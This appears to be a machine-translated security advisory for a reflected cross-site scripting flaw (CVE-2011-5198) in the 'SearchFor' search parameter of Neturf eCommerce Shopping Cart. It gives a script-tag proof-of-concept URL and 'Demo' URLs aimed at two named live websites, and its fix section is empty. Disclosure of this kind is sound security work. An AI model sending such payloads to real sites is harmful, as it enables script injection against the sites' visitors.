Release date:
Updated on: 2012-10-02
Affected Systems:
Neturf eCommerce Shopping Cart
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2011-5198
Neturf eCommerce Shopping Cart is a network Shopping Cart application.
Neturf eCommerce Shopping Cart does not properly filter and pass to search. the input of the "SearchFor" parameter in php is returned to the user. attackers can execute arbitrary HTML and script code in the user's browser of the affected site.
<* Source: farbodmahini
Link: http://secunia.com/advisories/47354
Http://packetstormsecurity.org/files/108231/neturf-xss.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit:
#
# Http://target.com/search.php? SearchFor = <script> alert (/farbodmahini/) </script>
#
#
# Demo:
#
# Www.neturf.com/search.php? SearchFor = <script> alert (/farbodmahini/) </script>
# Www.darkhorseobservatory.org/search.php? SearchFor = <script> alert (/farbodmahini/) </script>
#
Suggestion: